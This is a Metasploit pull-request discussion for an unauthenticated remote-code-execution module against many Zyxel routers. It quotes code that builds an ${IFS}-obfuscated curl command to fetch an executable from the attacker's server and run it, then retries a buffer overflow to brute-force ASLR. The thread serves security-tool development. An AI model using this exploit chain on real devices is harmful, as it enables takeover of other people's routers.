Unauthenticated RCE for multiple Zyxel router #17388
Conversation
Added the requested changes
```ruby
if ((datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::'))
  fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
end
```
These checks are not covering all the cases to detect if the option is really an IPv4 or IPv6 address, and if it refers to the "This host on this network" address. The following checks using the Rex::Socket helpers are more reliable and should be used instead:
metasploit-framework/lib/msf/core/exploit/remote/jndi_injection.rb
Lines 134 to 136 in 9d866a3
```ruby
if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
  fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
end
```
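A stdlib-only illustration of the reviewer's point, added here and not part of this PR or of Metasploit (the helper names and the sample SRVHOST values are constructed): the module's original string comparison beside a check that parses the option as an address, so every spelling of the unspecified address is caught.

```ruby
require 'ipaddr'

# Constructed helper (not Rex::Socket): true when SRVHOST is an IP literal that
# remote devices can never connect back to, i.e. the unspecified address
# (0.0.0.0 or ::), whatever textual form it was typed in. Mirrors the intent of
# Rex::Socket.is_ip_addr? && Rex::Socket.addr_atoi(...) == 0 from the review.
def unspecified_srvhost?(value)
  addr = IPAddr.new(value)
  # ::ffff:0.0.0.0 is the IPv4-mapped form of the unspecified v4 address
  addr = addr.native if addr.ipv6? && addr.ipv4_mapped?
  addr.to_i.zero?
rescue IPAddr::InvalidAddressError
  false # not an IP literal (e.g. a hostname); leave it to name resolution
end

# The string comparison from the module as submitted, for side-by-side comparison.
def naive_check(value)
  value == '0.0.0.0' || value == '::'
end

# Constructed sample SRVHOST values: several spellings of the unspecified
# address, two routable ones and a hostname.
SAMPLES = [
  '0.0.0.0', '::', '0:0:0:0:0:0:0:0', '::0', '::ffff:0.0.0.0',
  '192.0.2.10', '2001:db8::1', 'lanhost'
].freeze

# Returns [value, naive verdict, parsed verdict] for each sample.
def compare
  SAMPLES.map { |v| [v, naive_check(v), unspecified_srvhost?(v)] }
end

compare.each { |v, naive, parsed| puts format('%-16s naive=%-5s parsed=%s', v, naive, parsed) }
```

The rows for `::0`, `0:0:0:0:0:0:0:0` and `::ffff:0.0.0.0` are the cases the string comparison lets through.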
```ruby
srv_host = datastore['SRVHOST']
srv_port = datastore['SRVPORT']
@cmd_file = rand_text_alpha_lower(1)
payload_file = rand_text_alpha_lower(1)

# generate our payload executable
@payload_exe = generate_payload_exe

# Command that will download @payload_exe and execute it
download_cmd = 'curl${IFS}'
if datastore['SSL']
  # https:// can't be a substring as the zyxel parser won't be able to understand the URI
  download_cmd += '-k${IFS}https:`echo${IFS}//`'
end
download_cmd += "#{srv_host}:#{srv_port}/#{payload_file}${IFS}-o${IFS}/tmp/#{payload_file};chmod${IFS}+x${IFS}/tmp/#{payload_file};/tmp/#{payload_file};"

http_service = "#{srv_host}:#{srv_port}"
print_status("Starting up our web service on #{http_service} ...")
start_service({
  'Uri' => {
    'Proc' => proc do |cli, req|
      on_request_uri(cli, req)
    end,
    'Path' => "/#{payload_file}"
  }
})

print_status('Going to bruteforce ASLR, this might take a while...')

count = 1
exploit_url = build_buffer_overflow_url(download_cmd)
timeout = 0
until @payload_sent
  print_status("Trying to overflow the buffer, attempt #{count}")
  send_exploit(exploit_url)
  count += 1
  timeout += 6

  if timeout == datastore['MAX_WAIT'].to_i
    fail_with(Failure::Unknown, "#{peer} - Timeout reached! You were either very unlucky or the device is not vulnerable anymore!")
  end
```
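Review bot: the exit condition `if timeout == datastore['MAX_WAIT'].to_i` at the bottom of the `until @payload_sent` loop only fires when MAX_WAIT is an exact multiple of the 6 added per attempt; any other value (100, say) never equals the counter, so the loop never reaches `fail_with` and spins until the session appears or the user aborts. Compare with `>=` instead, or track a wall-clock deadline (`Time.now` plus MAX_WAIT seconds) rather than a fixed 6-per-attempt estimate, so MAX_WAIT bounds the run regardless of how long each `send_exploit` call actually takes.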
It looks like all of this could be replaced by a simple cmdstager with the curl flavor. This is the current standard and should be used as much as possible.
You can find an updated cmdstager documentation here (still a WIP PR) or the original documentation here.
Please, let us know if you need help or if you have any questions about this.
Hi, I tried to change my code up in order to use the cmdstager. However, I can't figure out how to run the exploit multiple times (required, as it will bruteforce ASLR). My current idea would be to call execute_cmdstager until a new session is opened. This should be possible by polling the session count.
Is there a better option?
After looking into the logic again, I agree that the cmdstager might be complicated to use. It might not be a good solution here. You can still call execute_cmdstager multiple times, but if you have a big payload, it will call execute_command multiple times for each call to execute_cmdstager. There might be a workaround for this, but I'm not sure it is worth the effort.
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be run from the root directory of Metasploit:
You can automate most of these changes with the
Please update your branch after these have been made, and reach out if you have any problems.
Hey @shr70. I wasn't able to successfully emulate one of these devices for testing. Would you provide us with a packet capture demonstrating the exploit? If you are able to send one, be sure to remove any sensitive data from it and email msfdev[at]metasploit.com. Thank you.
@jheysel-r7 I just sent over a sanitized pcap of a successful exploitation
…ce.rb Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
…s_zhttp_lan_rce.md Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
…ce.rb Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
…ce.rb Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
@shr70 thank you for the pcap. Everything looks great. I just pushed a couple changes to address a couple final comments and linting issues.
Release Notes
This PR adds a new exploit module for a buffer overflow in roughly 45 different Zyxel router and VPN models.
This request adds a new exploit module for a buffer overflow in roughly 45 different Zyxel router and VPN models.
The security advisory can be found here. A blogpost with more information has been published on the SEC Consult blog.
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce
check
run
A video of the successful exploitation can be found here: https://youtu.be/hbF3LEljxSA